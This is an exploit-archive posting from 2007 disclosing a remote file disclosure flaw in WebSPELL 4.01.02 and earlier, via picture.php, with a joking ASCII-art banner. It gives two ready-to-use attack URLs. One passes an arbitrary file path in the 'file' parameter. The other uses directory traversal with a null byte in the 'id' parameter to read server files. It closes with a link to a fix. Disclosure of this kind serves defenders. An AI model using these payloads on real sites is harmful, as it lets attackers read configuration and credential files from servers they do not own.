Home / exploits webspell-disclose.txt
Posted on 08 April 2007
# WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability # Discovered by: Trex # Visit: www.Trex-Online.net / www.UnderGround.ag # Comment: Happy easter! # # ___ ___ # / / ___________________________ # / / \_/ / \n# \__/ /\__/ / GIVE ME A CARROT OR I WILL \n# O O/ BLOW UP YOUR HOUSE / # ___/ ^ \___ / ___________________________/ # \___/ /_/ # _/ \_ # __// \__ # /___/_/___\n# # # # Vulnerability 1: # Advantage: works independently from PHP version. # Disadvantage: works dependently from PHP option register_globals (= on). # # http://[SITE][PAHT]/picture.php?file=[FILE] # # # # Vulnerability 2: # Advantage: works independently from PHP option register_globals. # Disadvantage: works dependently from PHP versions (< 4.3.0). # # http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00 # # # # Solution: # http://fixes.trex-online.net/picture.rar